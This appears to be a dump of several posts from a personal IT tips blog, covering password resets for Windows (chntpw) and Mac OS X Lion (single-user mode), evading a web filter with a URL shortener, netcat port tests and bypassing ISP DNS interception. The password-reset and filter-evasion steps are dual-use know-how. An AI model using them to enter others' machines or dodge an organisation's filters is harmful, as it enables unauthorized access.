<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnstTgaPMpt4igQNo7A-Jt4JK9E6sE-bC0lJiJq3tF3EwRARPsobRXOwjMIf0anhv1IMXl-CgamE0rTznikogOQykD9OXyXX28tFwhraf_3Fn1sLA4JJNi_TSmnWfvbQwzkfARRubnygo/s1600/scrubbed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnstTgaPMpt4igQNo7A-Jt4JK9E6sE-bC0lJiJq3tF3EwRARPsobRXOwjMIf0anhv1IMXl-CgamE0rTznikogOQykD9OXyXX28tFwhraf_3Fn1sLA4JJNi_TSmnWfvbQwzkfARRubnygo/s1600/scrubbed.png" /></a></div>
<br />
<i>Here's another comment of them admitting the problem but claiming that it is still safe to use their website:</i> <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHic_s5dX8R-mcN6RCvm4eiv4OHkzqaiYrdjGlWiN25tp3tekdHeGk54JbCR3Qreemv9y956H9IGGn1LMrHRrqnN5tdgKzrih1XXJCSBDJflqyVSvuILj0oJJub2mObOhV8pc719_niJ8/s1600/another.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHic_s5dX8R-mcN6RCvm4eiv4OHkzqaiYrdjGlWiN25tp3tekdHeGk54JbCR3Qreemv9y956H9IGGn1LMrHRrqnN5tdgKzrih1XXJCSBDJflqyVSvuILj0oJJub2mObOhV8pc719_niJ8/s1600/another.png" /></a></div>
<br />
<br />
<i>UPDATE 2 of 3: BancorpSouth has finally fixed their website. It was insecure for THREE DAYS.</i><br />
<br />
<i><i>UPDATE 3 of 3: </i>It occurred to me just now that when BancorpSouth told their users that the site was still safe they were unfortunately conditioning their customers to ignore security errors. <span data-ft="{"tn":"K"}" data-reactid=".r[4zmlr].[1][4][1]{comment10151936246624180_31235644}.[0].{right}.[0].{left}.[0].[0].[0][2]"><span data-reactid=".r[4zmlr].[1][4][1]{comment10151936246624180_31235644}.[0].{right}.[0].{left}.[0].[0].[0][2].[0]"><span data-reactid=".r[4zmlr].[1][4][1]{comment10151936246624180_31235644}.[0].{right}.[0].{left}.[0].[0].[0][2].[0].[0]">This is very
bad practice. Now they have conditioned their users to disregard certificate errors. So what if a user next month is the victim of a
hack that redirects them to a malicous site but shows a certificate error? The
user will ignore it because they have been conditioned to and potentially get their credentials stolen! Way to go
BancorpSouth! :(</span></span></span></i>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-86840471066671887362013-08-28T01:01:00.000-05:002013-08-29T16:43:23.012-05:00Decieve a Webfilter With a URL Shortner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3dEGcLrJBBznsgA51wlhC6753BKjIj8OcS3zzjCi2I0GTUQxq8w3EMrhEMbWO65FT_Rl50647Sw9Fv3AU98f6OFmSyGopU_kq3bdzDkwJM6epGUhHgpSxWZvKRt-2Rmr9er9wjD_j42Q/s1600/nojoy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3dEGcLrJBBznsgA51wlhC6753BKjIj8OcS3zzjCi2I0GTUQxq8w3EMrhEMbWO65FT_Rl50647Sw9Fv3AU98f6OFmSyGopU_kq3bdzDkwJM6epGUhHgpSxWZvKRt-2Rmr9er9wjD_j42Q/s320/nojoy.png" width="320" /></a></div>
<br />
This is not foolproof but I have had it get me out of a jam... Sometimes I will have a web filter that is blocking me from downloading something like an admin/security tool and I either don't have access to the web filter appliance or am tired of trying to make the web filter appliance behave. (They can be really finicky, sometimes!!) One trick I have found that has helped me out when I am in a big hurry is to download a file is to use a URL shortner. Strangely enough, I've seen multiple brands of web filter appliances that weren't smart enough to deal with this. What I will do is simply copy the actual download URL to the file and put it in something like <a href="http://tinyurl.com/">tinyurl.com</a>. Then I use the new URL and quite often, the web filter lets it get by! Joy!Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3627429161857795589.post-21973953621102545532013-08-26T02:02:00.000-05:002013-08-26T14:01:09.630-05:00Using Mountain Lion's built in TFTP server<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4_JKowO87UZcwBYg9M2jYaAv1HfNcOpnylNHzdQD2l24IHWfmi2k4kS6ILAb-5wlXP5Q4CudxhyoTtZUzzAS_co1E0PLcE-037C46x4HE4brRWWwlBPi94BXgwwws8nS88HI_mWyniE/s1600/glowing-fruit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt4_JKowO87UZcwBYg9M2jYaAv1HfNcOpnylNHzdQD2l24IHWfmi2k4kS6ILAb-5wlXP5Q4CudxhyoTtZUzzAS_co1E0PLcE-037C46x4HE4brRWWwlBPi94BXgwwws8nS88HI_mWyniE/s400/glowing-fruit.png" width="400" /></a></div>
<br />
It's finally clear to me why Macs are better. Because there's a TFTP server built in, of course! This feature is obviously built in for all those more-creative-than-thou types who disdain Windows computers because there isn't a glowing piece of fruit embedded into the chassis. Because those kind of people need a TFTP server, right?<br />
<br />
So how do you use Mac OS X Mountain Lion's built in TFTP server? Well, like all things Mac, it's as user friendly as all get out...<br />
<br />
1. Turn off the Mac firewall: System Preferences>Security and Privacy>Firewall<br />
<br />
2. Copy the file you want to provide to TFTP clients to the default TFTP directory /private/tftpboot/ by using a command like: <i><b>sudo cp /Users/jdoe/Documents/file.tar /private/tftpboot/file.tar</b></i><br />
<br />
3. Disable any antivirus/firewall software you may be running (doubtful)<br />
<br />
4. Grant read/write permissions on the file to everyone with this command:<br />
<b><i>sudo chmod 777 /private/tftpboot/[filename]</i></b><br />
<br />
5. Start the TFTP daemon with these commands: <br />
<i><b>sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist<br />sudo launchctl start com.apple.tftpd</b></i><br />
<br />
See? I told you Apple makes everything easy and straightforward on a Mac! So you trendy types be sure to get you a post-it-note with these commands placed on your monitor for easy reference!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-24007660635519008932013-07-17T00:31:00.000-05:002013-07-18T13:50:49.408-05:00Reset Local Windows Password with chntpw<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHhVzoHoFJCQnahA1h_vXuqWAB7L5nHLE3HV8aArH4YofgZx9to1NIp_NKSKxtAKvhLwyqXgRTnwHxHPRsjw_lGr2nMS-QQP-7tmVogGnOB4ACzLVOTNFYER8okUzesHU0Otq0EyrZb_s/s1600/knoppix.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHhVzoHoFJCQnahA1h_vXuqWAB7L5nHLE3HV8aArH4YofgZx9to1NIp_NKSKxtAKvhLwyqXgRTnwHxHPRsjw_lGr2nMS-QQP-7tmVogGnOB4ACzLVOTNFYER8okUzesHU0Otq0EyrZb_s/s1600/knoppix.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
I usually prefer to reset local Windows admin passwords with <a href="http://pogostick.net/~pnh/ntpasswd/" target="_blank">Offline NT Password & Registry Editor</a>. But what if all you have handy is a live Knoppix? Here's how to do it with Knoppix using chntpw. It's far more simple than I had thought, so give it a try.<br />
<br />
<ol>
<li>Boot into Knoppix and pull up a root terminal</li>
<li><b>apt-get install chntpw</b> (requires a network connection)</li>
<li>Mount the Windows system drive before continuing to step 4</li>
<li><b>cd [mount_location]/WINDOWS/system32/config</b><b> </b></li>
<li><b>chntpw -l SAM</b><b> </b></li>
<li><b>chntpw -u Administrator SAM</b> </li>
<li>Enter <b>1</b> to blank password</li>
<li>Enter <b>y</b> to write changes<b> </b></li>
<li><b>chntpw -u Administrator SAM</b> </li>
<li>Enter <b>4</b> to unlock and enable the account</li>
<li>Enter <b>y</b> to write changes<b> </b></li>
<li><b>chntpw -l SAM</b></li>
</ol>
<br />
Keep in mind that as the program warns, it's a bit "hacky". You may have to try it multiple times for it to work. Also, I found interactive mode to be too buggy to even use. I would just use the commands above. You should also know that is always best to <i>clear</i> the password instead of <i>changing</i> it. The latter has a much lower success rate. If you do clear it, you may want to unplug the network cable until you are able to log into Windows and change it. It may sound paranoid, but you don't want to get hacked because you had a blank password for 60 seconds. Especially on a web server that is on the world wide web.<br />
<br />
I hope this helps you if you are in a jam sometime and have no choice but to do it the old fashioned way with chntpw!<br />
<br />
P.S. I only had a chance to test this on XP using Knoppix 7.0.5, so please leave a comment on your experience with other versions!<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-43177749314618788472013-01-29T18:02:00.000-06:002013-01-29T10:04:00.934-06:00Reset Mac OS X Lion PasswordIf you need to reset the password on Mac OS X Lion but you don't have any secondary admin accounts, it's actually pretty easy. Even if you don't have an install disc.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQPvmBY6staTglzXLKwJ2eP5dyi6F-nDDZYuDTF9zOVaZPr2Dc_H3qGPEC8-8uCzbzoUHW-DAYxsl05SMqwCZosQp5kHeZe4LbLPpXOSA94yvsVlMSMLRVta6ZrFzl24JCLRa2YpILDg/s1600/photo(1).JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQPvmBY6staTglzXLKwJ2eP5dyi6F-nDDZYuDTF9zOVaZPr2Dc_H3qGPEC8-8uCzbzoUHW-DAYxsl05SMqwCZosQp5kHeZe4LbLPpXOSA94yvsVlMSMLRVta6ZrFzl24JCLRa2YpILDg/s400/photo(1).JPG" width="400" /></a></div>
<br />
Different versions of OS X require different stuff but this post specifically applies to Lion. (That's the only OS I tested it on, at least.) So here are the instructions:<br />
<br />
1. Power up the Mac<br />
2. As soon as you see the gray screen, hold down Command-S<br />
3. Let go once you see text on a black background<br />
4. Once the text stops scrolling, hit enter<br />
5. Enter this command: <i>mount -uw /</i><br />
6. Enter this command: <i>rm /var/db/.AppleSetupDone</i><br />
7. Enter this command: <i>reboot</i><br />
8. Go through the setup wizard and choose defaults. Do not import any data, etc. Name your user something like temp<br />
9. Login as the new user<br />
10. Navigate to System Preferences>Users & Groups, click the padlock icon and authenticate<br />
11. Select the user who you want to reset the password for and click Reset Password<br />
12. After resetting the password, logout<br />
13. Login as the user that you reset the password for<br />
14. When you get the keychain dialog, you will likely just want to just choose new, but it's up to you<br />
15. Delete the temp user you created<br />
<br />
The end!<br />
<br />
If you are not sure what version of OS X you have, you may want to type the following command right after step 4: <i>uname -a</i> The information displayed can be checked against <a href="http://en.wikipedia.org/wiki/Darwin_%28operating_system%29" target="_blank">here</a> or by googling to determine the operating system.<br />
<br />
Although it is always a good idea to have backups and I can't be held liable for data loss, etc., the method above is one that should <i><b>not</b></i> harm any data at all. So don't freak out. This method should not remove data from the user account you are trying to get into.<br />
<br />
<br />
Enjoy!Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-29429007178860457692012-11-23T23:02:00.000-06:002012-11-27T08:51:36.859-06:00Test open ports by chatting from the command line<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfBG2acAq0LrvFLgQZydThhmk5oKMJCc9QHItqCmmBbBDD9y1VENJWCRitpQsyaSl9J9z_LVTfQCN3S9Lyzec4_Kv7kDumCaQPFY0havSsNAdVPBFjfZvHFdJ0rATxKn5-jhkgWAtAGg/s1600/netcat2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHfBG2acAq0LrvFLgQZydThhmk5oKMJCc9QHItqCmmBbBDD9y1VENJWCRitpQsyaSl9J9z_LVTfQCN3S9Lyzec4_Kv7kDumCaQPFY0havSsNAdVPBFjfZvHFdJ0rATxKn5-jhkgWAtAGg/s1600/netcat2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Today I needed to test whether or not a specific TCP/IP port on a firewall/server was open and whether or not traffic could successfully flow via that port without firewall interference. I needed to do this independent of the normal server application that handles this for testing purposes. I just needed to make sure the firewall aspect was all set to go.<br />
<br />
Well, why not solve this problem with <a href="http://en.wikipedia.org/wiki/Netcat" target="_blank">netcat</a>? Here's how I did it...<br />
<br />
First, I put a box booted into <a href="http://www.knopper.net/knoppix/index-en.html" target="_blank">Knoppix</a> at Site A and a Mac with Mountain Lion at Site B. (Netcat also exists for Windows.) I then disabled the Mountain Lion firewall temporarily and started up the netcat server at Site B:<br />
<br />
<b>nc -vl 666</b><br />
<br />
The v is for verbose of course and the l tells it to be the listener/server. The 666 is the port it will listen on, lol. (All IP addresses and ports have been changed to protect the innocent.)<br />
<br />
At Site A, I then had someone run this command on the Knoppix rig:<br />
<br />
<b>nc -v 172.31.31.31 666</b><br />
<br />
This caused netcat to connect to the remote server via its IP address on port 666. At that point, I started chatting over the command line back and forth with the person at Site A like as if we were instant messaging. Who knew this could be so fun?! When I typed something on my screen and pressed enter, it appeared on their command line terminal and vice versa. Interestingly, until I solved a firewall issue, the netcat client would connect but when you typed text, you couldn't see it on the other end.<br />
<br />
This utility is very useful and this post only shows <a href="http://digiassn.blogspot.com/2006/01/dd-over-netcat-for-cheap-ghost.html" target="_blank">one of many things</a> netcat can do. By default, netcat uses TCP. For checking UDP, you can simply add the u switch to the command from both the server and the client. The 4 switch can also force netcat to use IPv4 which will help avoid problems.<br />
<br />
This was a very lightweight, portable and easy way to test connectivity on a specific port and required no installation or configuration at all. This also allowed me to test completely independent of any normal server applications, etc. to rule out the possibility of any firewall filtering. [does happy little geek dance]<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3627429161857795589.post-90021855412309327312012-11-18T23:47:00.000-06:002012-11-19T12:01:27.728-06:00Forward your Android SMS to email<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKsPGmhrkBTbAWRPN05PN-3fJB-VnuwMLsXaVhji3ha1M4pQEp4JL8ph9SRRkDwRXbsMZP0dJ9JYJuTxL7dwOxGHfIM500NjXTEqcUlh7eG86cuw27CN0w7YL1TfAKYb-aIM9AJWWGsU/s1600/sms1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtKsPGmhrkBTbAWRPN05PN-3fJB-VnuwMLsXaVhji3ha1M4pQEp4JL8ph9SRRkDwRXbsMZP0dJ9JYJuTxL7dwOxGHfIM500NjXTEqcUlh7eG86cuw27CN0w7YL1TfAKYb-aIM9AJWWGsU/s320/sms1.png" width="320" /></a></div>
<br />
There are apps out there that forward your SMS to your email but in my experience they all either don't work, or cost money. Being the cheapskate that I am, definitely wasn't going to pay money for something like that, so I started brainstorming.<br />
<br />
I needed something to be running on my Android phone that would grab my texts and email them to me. That way if I get an SMS and my phone is in the other room charging or something I could see it on my iPad, etc. Using Google Voice for this kind of stuff is not a perfect solution because they only forward SMS that was sent to your Google number, not to your actual cell phone number.<br />
<br />
I played around with a couple of apps and never could get the email feature to work. But I did get the feature to forward the SMS to another phone number to work, however. So I setup the free Android app "SMS Forwarding" to forward to my email via my IFTTT phone number and problem solved! Here's how to do it:<br />
<br />
1. Setup a free <a href="http://ifttt.com/">ifttt.com</a> acccount<br />
<br />
2. Setup my shared IFTTT recipe which you can find here: <a href="https://ifttt.com/recipes/66951">https://ifttt.com/recipes/66951</a>. You'll have to confirm your phone number and email address with IFTTT and what not but it's pretty self-explanatory.<br />
<br />
3. Install free Android app "<a href="https://play.google.com/store/apps/details?id=com.intensoft.smstransfer&hl=en" target="_blank">SMS Forwarding</a>" on your Android phone. I believe the version I am using is 1.4.3.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH0dsLad35YSTKnAlWC0UY1CeCD2SPOmYS5cC3EkY08SpQ3vp_8WG-zFU7el9ffkN6gPkuOhE2FyNiTaR-TJqLqMEJX4O3XVegQDKRqeQYlzvwc_V86vJDlgUPoXZbtYjzrD9bEVyCvj4/s1600/sms2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH0dsLad35YSTKnAlWC0UY1CeCD2SPOmYS5cC3EkY08SpQ3vp_8WG-zFU7el9ffkN6gPkuOhE2FyNiTaR-TJqLqMEJX4O3XVegQDKRqeQYlzvwc_V86vJDlgUPoXZbtYjzrD9bEVyCvj4/s1600/sms2.png" /></a></div>
<br />
4. Setup the "SMS Forwarding" app to forward all your SMS messages to your IFTTT phone number. To do this, you will open the app, check "Enable Forwarding" and check "Forward with SMS". Then select "Destination Number" and enter your IFTTT phone number. You can find your IFTTT phone number by viewing your IFTTT recipe or your IFTTT SMS channel. Here's a screenshot of the app before configuration has taken place. (Don't copy these settings.) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ2P-8TTn6V9yq6eXMxnMn32VK253DPszgSE5QlHXZZkj3kuZmkGyMxhyphenhyphen8xj5pyvvea_ELbr2ip-RuIzWB57J-CMMMLFvZ-K2xkZNYeU8tE3T3oDPCU3oZaIs9Kp85Eb3RkTslp9zOKc/s1600/sms3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHJ2P-8TTn6V9yq6eXMxnMn32VK253DPszgSE5QlHXZZkj3kuZmkGyMxhyphenhyphen8xj5pyvvea_ELbr2ip-RuIzWB57J-CMMMLFvZ-K2xkZNYeU8tE3T3oDPCU3oZaIs9Kp85Eb3RkTslp9zOKc/s320/sms3.png" width="180" /></a></div>
<br />
5. Test it out. It should be good to go now!! Mine's working great! You can also setup "SMS Forwarding" to notify you of missed calls and low battery but I haven't tried those yet. Be sure to comment if you try them!<br />
<br />
BTW, <a href="http://ifttt.com/">ifttt.com</a> is awesome! There are a zillion different things you can do with this free service...<br />
<br />
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-3627429161857795589.post-18401141964848207592012-11-15T22:47:00.000-06:002013-01-28T08:30:03.787-06:00Stop your ISP from intercepting your DNS queriesMy ISP hacked me.<br />
<br />
Dude, by default they intercept all customers' DNS queries and redirect them to their DNS servers. Then, they answer the DNS queries with their servers and spoof the originating server within the DNS response to make it look like they didn't intercept it. They're a regular man-in-the-middle! Total lameness.<br />
<br />
Now, normally this wouldn't bother me too much because I would prefer to use an ISP's DNS servers. They will typically be your fastest resource for a DNS response. But spoofing responses to me? That's over the top. What if I wanna use OpenDNS to filter my internet? Or what if I just simply wanna troubleshoot a DNS issue by querying another ISP's DNS server? No go.<br />
<br />
I know why they do this. They are trying to control bandwidth on their end. But this is a little extreme.<br />
<br />
There's another side to this: My ISP's DNS servers stink!! They go down for 10 minutes at a time without warning. During these periodic outages I can ping by IP address but not by name and the internet is effectively dead. Total lameness.<br />
<br />
So…We have DNS servers that aren't reliable and we have an ISP that forces you to use the bad DNS servers. Great situation!<br />
<br />
After fighting with my ISP's customer service and getting nowhere, I decided it was time to take matters into my own hands and solve this problem myself.<br />
<br />
First, I proved this was indeed the problem by setting my WZR-HP-G300NH2/Gargoyle (see previous <a href="http://breakstuffmajorly.blogspot.com/2012/11/use-gargoyle-to-control-bandwidth.html" target="_blank">post</a>) router to use Google's DNS servers and then checking the logs. The logs showed that I was actually talking to my ISP's DNS servers even when I made queries to Google!<br />
<br />
I started thinking…They've got to be intercepting this based on port number…What if there was a DNS server out there somewhere that actually listened on an alternate port? Lo, and behold there is! OpenDNS' servers listen on both 53 and 5353! Now all I needed to do was make make Gargoyle/OpenWRT talk to their servers on the alternate port, thus circumventing my ISP's DNS servers!<br />
<br />
Using a <a href="http://wiki.openwrt.org/inbox/dnscrypt" target="_blank">wiki</a> designed for setting up <a href="http://www.opendns.com/technology/dnscrypt/" target="_blank">DNSCrypt</a> on OpenWRT (which maybe I will setup sometime), I SSHed to the router and backed up /etc/config/dhcp and then edited it using vi (I also backed up my config from the web interface):<br />
<br />
cp /etc/config/dhcp /etc/config/dhcp.bak<br />
vi /etc/config/dhcp<br />
<br />
If you don't know how to use vi, check <a href="http://www.lagmonster.org/docs/vi.html" target="_blank">here</a>. As shown below, under the "config dnsmasq" section I then commented the "option resolvfile" line and added 3 more lines under that line:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLze1Cm9BK-0B2C17KwARkRx1UhJ5meEJUeCl_LYmbTJvsDrkDOUsTmLfX0ShI5UU5lTlH5rPFwq5-rj9vhXv8Y8gYPJDMRSfWtE37oB-jSgDQmic-1RqbX6NjI1kM0lTLmkf6YUT1Bn4/s1600/dhcp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLze1Cm9BK-0B2C17KwARkRx1UhJ5meEJUeCl_LYmbTJvsDrkDOUsTmLfX0ShI5UU5lTlH5rPFwq5-rj9vhXv8Y8gYPJDMRSfWtE37oB-jSgDQmic-1RqbX6NjI1kM0lTLmkf6YUT1Bn4/s1600/dhcp.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
EDIT: Just to clarify, here are the three lines I added below the commented line:<br />
<br />
option noresolv '1'<br />
list server '208.67.222.222#5353'<br />
list server '208.67.220.220#5353'<br />
<br />
(Make sure you match the formatting/spacing shown in the image.)<br />
<br />
As you can see, the last 2 lines tell the router to use OpenDNS' servers and talk to them on alternate port 5353. Then I created an <a href="http://www.opendns.com/" target="_blank">OpenDNS</a> account (not necessary) and restarted the router's DNS daemon:<br />
<br />
/etc/init.d/dnsmasq restart<br />
<br />
...Now OpenDNS has a page at <a href="http://internetbadguys.com/">http://internetbadguys.com</a><b> </b>that they block just for testing purposes...so I went to a computer to see if I was successfully blocked (I cleared the DNS cache on the computer first):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tHSYYg3i1T7aaXhD_N1AINIQOZ9WFpoRcmt9yLRN2E6HhnuQcw3IQnF5v660ODcuNze-UHRdE7RNk_0usMYQbBU3JYDssgIYBWH2r_2ZFCzNn8vaVQReqQeJSTOk-IJ3pklGLXIPOmo/s1600/badguys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8tHSYYg3i1T7aaXhD_N1AINIQOZ9WFpoRcmt9yLRN2E6HhnuQcw3IQnF5v660ODcuNze-UHRdE7RNk_0usMYQbBU3JYDssgIYBWH2r_2ZFCzNn8vaVQReqQeJSTOk-IJ3pklGLXIPOmo/s400/badguys.png" width="400" /></a></div>
<br />
Good! Here's what would have showed had I not been successfully blocked by OpenDNS' filtering:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPhPKqZjC8K8MEQx_uB63aXmXacjIlp8hk1ULAFxSLUUl9QnFNPWz-0GD66OssPtqMwrtBKFnCIiae3peyiXd-LNHXs3b3hbm_55yHHSJgRl0fAvTQSnlpfCfK-eQB1ZoYI-s0IbL5rs/s1600/badguys2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPhPKqZjC8K8MEQx_uB63aXmXacjIlp8hk1ULAFxSLUUl9QnFNPWz-0GD66OssPtqMwrtBKFnCIiae3peyiXd-LNHXs3b3hbm_55yHHSJgRl0fAvTQSnlpfCfK-eQB1ZoYI-s0IbL5rs/s400/badguys2.png" width="325" /></a></div>
<br />
<br />
<br />
I also checked my router logs and found lots of entries with 208.67.222.222:5353:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiogH-H9yh80xnec48I99EMI15PsxO_58IkOcvpwHdkl7b-VQzchPmHJPjQ9O5IKSZ-Jp1cxMhi17LgR9vzkY-zgWRF6cbv14l7Karla39mD27KG8lNu950lNEQWvcdhQtJnJ-fsefiEqQ/s1600/logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiogH-H9yh80xnec48I99EMI15PsxO_58IkOcvpwHdkl7b-VQzchPmHJPjQ9O5IKSZ-Jp1cxMhi17LgR9vzkY-zgWRF6cbv14l7Karla39mD27KG8lNu950lNEQWvcdhQtJnJ-fsefiEqQ/s400/logs.png" width="400" /></a></div>
<br />
<br />
Very good!! I searched my logs further for any queries to my ISP's DNS server and found none! I then backed up my router config, flushed the DNS cache on my boxes and laughed all the way home:<br />
<br />
Windows: ipconfig/flushdns<br />
Mac OS X ML: sudo killall -HUP mDNSResponder<br />
<br />
<b>Recap:</b><br />
My ISP = fail<br />
My ISP = pwned<br />
Me = Happy!<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-3627429161857795589.post-34359115830467683412012-11-14T19:16:00.000-06:002012-11-15T12:05:59.045-06:00Determine your home router's IP address remotelyToday I needed to determine the public IP address that my home network was using but I was not physically located at home and didn't have a means of remote access into my network without the IP address. (I'm working on getting dynamic DNS and remote access and all that but it isn't up yet.)<br />
<br />
So, I thought really hard about what I could do and it came to me...<br />
<br />
I happened to know that there was a computer on my home network with a browser window opened to Gmail...So I logged into Gmail from my remote location and scrolled all the way down. In the bottom right hand corner, this was displayed:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4jmxqYzT5lU0FORNZtzJYr0RriiD7OYIYziTGf_LhMhiHqfzY54tcXh07DKviEJ97Ocvlz2EMOEjMtN0t7ol6zoTJUMgXZw7rUIBdvHrQaVd7EKwlV8RtFANF3tgaIaerBbSvgazNfI/s1600/Screen+Shot+2012-11-15+at+11.57.02+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_4jmxqYzT5lU0FORNZtzJYr0RriiD7OYIYziTGf_LhMhiHqfzY54tcXh07DKviEJ97Ocvlz2EMOEjMtN0t7ol6zoTJUMgXZw7rUIBdvHrQaVd7EKwlV8RtFANF3tgaIaerBbSvgazNfI/s320/Screen+Shot+2012-11-15+at+11.57.02+AM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
I clicked "Details" and there was my home IP! This saved my bacon!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQHRVvgzy9CPXmyNfsVVuinFlsOdzPNU8LA-tTcfcRF3cbUR6zYf76Kt5zC0tDy2H1xTEozHDqGlmYj1D95ZFfKfnmf3wz2UKYi4of7-0uEGN0M-dFOfZWaBNOUseQPW348zux9mmZPw/s1600/ip2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqQHRVvgzy9CPXmyNfsVVuinFlsOdzPNU8LA-tTcfcRF3cbUR6zYf76Kt5zC0tDy2H1xTEozHDqGlmYj1D95ZFfKfnmf3wz2UKYi4of7-0uEGN0M-dFOfZWaBNOUseQPW348zux9mmZPw/s400/ip2.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />Unknownnoreply@blogger.com1